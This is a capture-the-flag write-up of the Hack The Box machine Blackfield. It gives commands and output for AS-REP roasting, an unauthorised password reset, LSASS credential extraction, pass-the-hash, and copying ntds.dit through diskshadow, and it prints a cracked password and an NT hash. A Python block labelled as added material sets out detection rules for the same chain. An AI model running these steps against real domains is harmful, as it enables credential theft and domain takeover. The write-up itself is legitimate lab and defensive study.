Hack The Box — Blackfield Write-up

Blackfield info card.

Summary

Blackfield is a Windows box of hard difficulty from the Hack The Box platform that was retired on 3 October 2020 at 19:00:00 UTC. By the time I did this box it was rated 4.9 ⭐️, which reflects its quality and the great experience it provides. The attack vectors exercised here include SMB enumeration, credential dumping and Backup/Restore privilege abuse.

Scanning and Enumeration

After adding an entry in our /etc/hosts file, we perform a typical scanning to check which ports are open.

$ ports=$(nmap -p- --min-rate=1000 -T4 blackfield.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -p$ports -T4 -Pn -A blackfield.htb

The result is a bunch of open ports, mostly related to Active Directory Domain Services:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-09-05 07:31:55Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h05m46s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-09-05T07:34:26
|_  start_date: N/A

So, we know that the target runs LDAP, Kerberos, Samba and we’ve got a domain as well (BLACKFIELD.local0). Let’s begin our enumeration with Samba.

SMB

We can use either smbclient or smbmap to enumerate shares, the latter being more verbose and providing more information.

$ smbclient -NL blackfield.htb

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

As shown in the smbmap output below, the guest account has read access to a non-default share called profiles$.

$ smbmap -u guest -p '' -H 10.10.10.192
[+] IP: 10.10.10.192:445        Name: blackfield.htb

        Disk            Permissions     Comment
        ----            -----------     -------
        ADMIN$          NO ACCESS       Remote Admin
        C$              NO ACCESS       Default share
        forensic        NO ACCESS       Forensic / Audit share.
        IPC$            READ ONLY       Remote IPC
        NETLOGON        NO ACCESS       Logon server share
        profiles$       READ ONLY
        SYSVOL          NO ACCESS       Logon server share

Listing the given share returns the following:

  .                                   D        0  Wed Jun  3 13:47:12 2020
  ..                                  D        0  Wed Jun  3 13:47:12 2020
  AAlleni                             D        0  Wed Jun  3 13:47:11 2020
  ABarteski                           D        0  Wed Jun  3 13:47:11 2020
  ABekesz                             D        0  Wed Jun  3 13:47:11 2020
  ABenzies                            D        0  Wed Jun  3 13:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 13:47:11 2020
  AChampken                           D        0  Wed Jun  3 13:47:11 2020
  ACheretei                           D        0  Wed Jun  3 13:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 13:47:11 2020
  ...                                 ...      ...  ...
  YVonebers                           D        0  Wed Jun  3 13:47:12 2020
  YZarpentine                         D        0  Wed Jun  3 13:47:12 2020
  ZAlatti                             D        0  Wed Jun  3 13:47:12 2020
  ZKrenselewski                       D        0  Wed Jun  3 13:47:12 2020
  ZMalaab                             D        0  Wed Jun  3 13:47:12 2020
  ZMiick                              D        0  Wed Jun  3 13:47:12 2020
  ZScozzari                           D        0  Wed Jun  3 13:47:12 2020
  ZTimofeeff                          D        0  Wed Jun  3 13:47:12 2020
  ZWausik                             D        0  Wed Jun  3 13:47:12 2020

These profile folders are probably named after Active Directory usernames, so we save the names to a text file for use in the next step.

Kerberos

Having created a file called profiles.txt containing the values from the first column of the previous output, we can use a tool called GetNPUsers.py, which is part of Impacket. The tool's description says it all:

Queries target domain for users with ‘Do not require Kerberos preauthentication’ set and export their TGTs for cracking.

Running the following command writes the TGTs (Ticket-Granting Tickets) to a file called tgts.txt, in a format that hashcat can read for cracking.

$ GetNPUsers.py -outputfile tgts.txt -format hashcat -usersfile profiles.txt -no-pass -dc-ip 10.10.10.192 blackfield.local/

The result is a TGT hash for user support@blackfield.local.

The output from command “cat tgts.txt” showing a TGT hash for user support@blackfield.local.

Besides that, looking at the command output we can see that there are two other valid user accounts (audit2020 and svc_backup), which simply don't have preauthentication disabled:

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Getting a Foothold

We will use hashcat to crack the hash found using RockYou wordlist:

hashcat -a 0 -m 18200 -o cracked.txt tgts.txt rockyou.txt

The -m 18200 option selects the Kerberos 5, etype 23, AS-REP hash type. The cracked password is #00^BlackKnight. This credential gives us no extra permissions on the Samba shares.

RPC

In this stage we perform a little more enumeration, this time using rpcclient. We start by issuing the command rpcclient -U support blackfield.htb and providing the password.

The command enumdomusers shows another user called lydericlefebvre that hadn't shown up earlier. The command getdompwinfo returns DOMAIN_PASSWORD_COMPLEX. The fact that the domain is configured to allow only complex passwords can be obtained with enum4linux as well:

$ enum4linux -u support -p "#00^BlackKnight" -S -d -P -G -k support,audit2020,lydericlefebvre,svc_backup 10.10.10.192
...
[+] Password Info for Domain: BLACKFIELD
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000001
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 1
...

From the output above we know that, besides being complex, passwords must also be at least 7 characters long.

Other rpcclient commands did not reveal anything more useful. One command that did work, however, and which we tried because of the current username (support), was the one that changes another user's password.

So, we can go ahead and change password for user audit2020 with the following command:

setuserinfo2 audit2020 23 'Pr0blem?'

SMB (again)

Now that we have changed the password for user audit2020, we should check its permissions on Samba shares:

$ smbmap -u audit2020 -p 'Pr0blem?' -H blackfield.htb
[+] IP: blackfield.htb:445      Name: unknown

        Disk            Permissions     Comment
        ----            -----------     -------
        ADMIN$          NO ACCESS       Remote Admin
        C$              NO ACCESS       Default share
        forensic        READ ONLY       Forensic / Audit share.
        IPC$            READ ONLY       Remote IPC
        NETLOGON        READ ONLY       Logon server share
        profiles$       READ ONLY
        SYSVOL          READ ONLY       Logon server share

Nice! We have access to the forensic share. We can connect to it and see what is inside.

$ smbclient -U 'audit2020%Pr0blem?' //10.10.10.192/forensic

After navigating through the directories, we find a file called lsass.zip in the memory_analysis folder. It is known that it is possible to dump passwords from an LSASS (Local Security Authority Subsystem Service) memory dump, so this file may contain something useful.

We can download the file to our machine with:

$ smbget -U 'audit2020%Pr0blem?' -r smb://10.10.10.192/forensic/memory_analysis/lsass.zip

We are close to own user!

Owning User

After unzipping the downloaded file, we can use pypykatz (a Python implementation of mimikatz) to extract credentials from the dump:

$ file lsass.DMP
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type
$ pypykatz lsa minidump lsass.DMP

The result is a NT hash for user svc_backup.

Output from pypykatz showing the NT hash for user svc_backup.

The next step is to use evil-winrm to perform a PtH (Pass-the-Hash) attack:

$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Once connected to the system, just grab the user flag: ff****************************15.

Execution of the evil-winrm command to get remote access to the target.

Owning System

We can start our enumeration with whoami /all to view information about our current user.

Output from command “whoami /all”.

Although the current user belongs to Backup Operators group and has SeBackupPrivilege and SeRestorePrivilege privileges, we can’t directly access the file ntds.dit.

The ntds.dit file is the database that stores Active Directory data, including information about user objects, groups and group membership. It holds the password hashes of every user in the domain, hence our interest in getting our hands on it.

The robocopy command with the /b option lets us copy a file in backup mode.

Diskshadow

In order to access ntds.dit we should create a shadow copy of volume C: with the diskshadow utility. This way we can copy the desired file to a temporary location and download it to our machine for analysis.

The server does not accept commands passed directly in the command line, so we should write scripts containing the desired instructions.

We can create two files to keep things organized: one for creating our shadow volume and exposing it to a temporary location, and another for cleaning things up.

The first script is as follows:

set context persistent nowriters
set metadata c:\temp\badbkp.cab
add volume c: alias badbkp
create
expose %badbkp% z:

It stores its metadata in C:\temp\badbkp.cab, which we read back in the second script:

load metadata c:\temp\badbkp.cab
delete shadows volume %badbkp%
reset

Assuming we have created the two scripts on a Linux machine and named them ds_unix.txt and ds_clean_unix.txt respectively, we should convert them so that they can be read without issues on our Windows target. We can do this very quickly:

unix2dos -n ds_unix.txt ds.txt
unix2dos -n ds_clean_unix.txt ds_clean.txt

Once the files have been uploaded to the target, we create our shadow copy and expose it as Z: with the command diskshadow.exe /s C:\temp\ds.txt.

Now we can run the following commands to copy ntds.dit and save the SYSTEM registry hive (needed to decrypt the database):

robocopy Z:\Windows\NTDS C:\temp ntds.dit /b
reg.exe save hklm\system c:\temp\SYSTEM.bak

Download files and cleanup:

diskshadow.exe /s C:\temp\ds_clean.txt
Remove-Item -path C:\temp -r
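From the blue-team side, every stage of this chain leaves a distinct trace in the Windows Security log: the AS-REP roast of support (a 4768 ticket request with Pre-Authentication Type 0), the rpcclient password reset of audit2020 by a non-admin (4724), and diskshadow.exe launched by svc_backup right after it received SeBackupPrivilege (4672 followed by 4688). The following added example, which is not part of the original write-up, runs three simple detection rules over constructed, simplified log events (not real exports); the KNOWN_ADMINS set and the event field names are assumptions.

```python
"""Detection rules for the Blackfield kill chain, run over constructed sample events."""

# Constructed, simplified Security-log events (assumed field names; not real exports).
EVENTS = [
    {"id": 4768, "user": "support", "preauth_type": "0", "ip": "10.10.14.5"},
    {"id": 4768, "user": "audit2020", "preauth_type": "2", "ip": "10.10.14.5"},
    {"id": 4768, "user": "svc_backup", "preauth_type": "2", "ip": "10.10.14.5"},
    {"id": 4724, "subject": "support", "target": "audit2020"},
    {"id": 4724, "subject": "Administrator", "target": "lydericlefebvre"},
    {"id": 4672, "user": "svc_backup", "privileges": "SeBackupPrivilege SeRestorePrivilege"},
    {"id": 4688, "user": "svc_backup", "process": r"C:\Windows\System32\diskshadow.exe",
     "cmdline": r"diskshadow.exe /s C:\temp\ds.txt"},
    {"id": 4688, "user": "Administrator", "process": r"C:\Windows\System32\diskshadow.exe",
     "cmdline": r"diskshadow.exe /s C:\backup\nightly.txt"},
]

# Accounts expected to reset passwords and run backup tooling (assumed for this example).
KNOWN_ADMINS = {"Administrator"}
# Binaries that honour SeBackupPrivilege and are abused for ntds.dit extraction.
BACKUP_TOOLS = {"diskshadow.exe", "robocopy.exe", "wbadmin.exe"}


def asrep_roastable(events):
    """4768 with Pre-Authentication Type 0: the KDC handed out an AS-REP without preauth,
    which is exactly what GetNPUsers.py collects. Fix: clear DONT_REQ_PREAUTH on the account."""
    return sorted({e["user"] for e in events if e["id"] == 4768 and e["preauth_type"] == "0"})


def unexpected_password_resets(events):
    """4724 (an attempt was made to reset an account's password) by a subject that is not a
    known admin, as with support resetting audit2020 via setuserinfo2."""
    return [(e["subject"], e["target"]) for e in events
            if e["id"] == 4724 and e["subject"] not in KNOWN_ADMINS]


def backup_privilege_abuse(events):
    """Backup tooling (4688) started by a non-admin account that was granted SeBackupPrivilege
    (4672) in the same log window: the Backup Operators pattern used against ntds.dit."""
    privileged = {e["user"] for e in events
                  if e["id"] == 4672 and "SeBackupPrivilege" in e["privileges"]}
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        exe = e["process"].rsplit("\\", 1)[-1].lower()
        if exe in BACKUP_TOOLS and e["user"] in privileged and e["user"] not in KNOWN_ADMINS:
            hits.append((e["user"], exe, e["cmdline"]))
    return hits


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(EVENTS))
    print("Unexpected resets:", unexpected_password_resets(EVENTS))
    print("Backup-privilege abuse:", backup_privilege_abuse(EVENTS))
```

In a real deployment the 4672/4688 correlation should be bounded to the same logon ID or a short time window, and Backup Operators membership reviewed so that service accounts such as svc_backup never hold it unnecessarily.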

Dumping Secrets

From our machine, we can now dump credentials using secretsdump.py:

secretsdump.py -system SYSTEM.bak -ntds ntds.dit LOCAL
Output from secretsdump.py.

Here we are interested in the hash for Administrator (RID 500). PtH again with evil-winrm and grab the root flag: 81****************************e4.

That’s it! Blackfield is awesome in many aspects. I hope you’ve enjoyed your journey!

Offensive security practitioner for fun and open source enthusiast. Sometimes I research or break something.